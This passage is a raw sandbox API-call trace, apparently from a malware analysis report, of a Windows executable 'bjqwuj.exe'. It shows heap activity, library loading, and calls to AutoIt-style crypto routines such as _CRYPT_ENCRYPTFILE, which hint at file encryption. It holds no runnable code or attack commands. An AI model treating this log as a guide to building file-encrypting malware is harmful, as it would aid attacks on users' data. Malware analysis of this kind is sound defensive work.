0x690910 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0077.292] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.292] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.292] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.293] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.293] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e228 [0077.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e228, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.293] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.294] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0077.294] CloseHandle (hObject=0x128) returned 1 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.294] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.294] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0077.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0077.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0077.295] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0077.295] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0077.295] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0077.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0077.295] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0077.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0077.296] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0077.296] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0077.296] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0077.296] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0077.296] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0077.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.296] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.296] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.296] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0077.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0077.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0077.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0077.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0077.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0077.297] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.297] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa80ac680, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xa80ac680, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xb1dffa00, ftLastWriteTime.dwHighDateTime=0x1d661bc, nFileSizeHigh=0x0, nFileSizeLow=0xfdc00, dwReserved0=0x0, dwReserved1=0x657690, cFileName="bjqwuj.exe", cAlternateFileName="")) returned 0x6b89b8 [0077.297] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0077.297] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.297] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa80ac680, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xa80ac680, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xb1dffa00, ftLastWriteTime.dwHighDateTime=0x1d661bc, nFileSizeHigh=0x0, nFileSizeLow=0xfdc00, dwReserved0=0x0, dwReserved1=0x657690, cFileName="bjqwuj.exe", cAlternateFileName="")) returned 0x6b89b8 [0077.297] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0077.297] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.297] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bjqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jqwuj.exe\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0077.299] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0077.299] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0077.299] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0077.299] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.299] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exe", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0077.300] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0077.300] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.300] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.300] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.300] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0077.300] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.300] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa80ac680, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xa80ac680, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xb1dffa00, ftLastWriteTime.dwHighDateTime=0x1d661bc, nFileSizeHigh=0x0, nFileSizeLow=0xfdc00, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="bjqwuj.exe", cAlternateFileName="")) returned 0x6b8b38 [0077.300] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0077.300] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.300] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.300] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.300] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.301] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0077.301] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.301] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0077.301] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.301] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0077.301] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0077.301] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0077.301] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 